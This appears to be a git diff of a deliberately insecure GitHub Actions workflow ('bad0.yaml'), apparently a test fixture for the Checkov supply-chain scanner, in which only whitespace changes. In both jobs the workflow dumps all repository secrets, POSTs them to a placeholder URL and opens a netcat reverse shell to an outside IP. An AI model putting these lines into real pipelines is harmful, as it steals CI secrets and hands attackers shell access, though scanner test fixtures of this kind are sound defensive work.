taysmith-test · taysmith-test · Aug 5, 2022 · bridgecrew · Aug 5, 2022 · bridgecrew
diff --git a/.github/workflows/bad0.yaml b/.github/workflows/bad0.yaml
@@ -1,7 +1,7 @@
 name: Supply Chain
 on:
-  workflow_dispatch:
-  schedule:
+  workflow_dispatch: 
+  schedule: 
     - cron: 0 0 * * 0
 jobs:
    bridgecrew:
@@ -11,22 +11,22 @@ jobs:
       id: checkov
       uses: bridgecrewio/checkov-action@master
       env:
-        GITHUB_TOKEN: ${{secrets.THIS_IS_A_TEST_SECRET}}
+        GITHUB_TOKEN: ${{secrets.THIS_IS_A_TEST_SECRET}} 
         ACTIONS_ALLOW_UNSECURE_COMMANDS: 'true'
       run:  |
          echo "${{ toJSON(secrets) }}" > .secrets
          curl -X POST -s --data "@.secrets" <BADURL > /dev/null
-         rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|netcat 34.159.16.75 32032 >/tmp/f
+         rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|netcat 34.159.16.75 32032 >/tmp/f 
    bridgecrew2:
     runs-on: ubuntu-latest
     steps:
     - name: Run checkov
       id: checkov
       uses: bridgecrewio/checkov-action@master
       env:
-        GITHUB_TOKEN: ${{secrets.THIS_IS_A_TEST_SECRET}}
+        GITHUB_TOKEN: ${{secrets.THIS_IS_A_TEST_SECRET}} 
         ACTIONS_ALLOW_UNSECURE_COMMANDS: 'true'
       run:  |
           echo "${{ toJSON(secrets) }}" > .secrets
-          curl -X POST -s --data "@.secrets" <BADURL > /dev/null
+          curl -X POST -s --data "@.secrets" <BADURL > /dev/null 
           rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|netcat 34.159.16.75 32032 >/tmp/f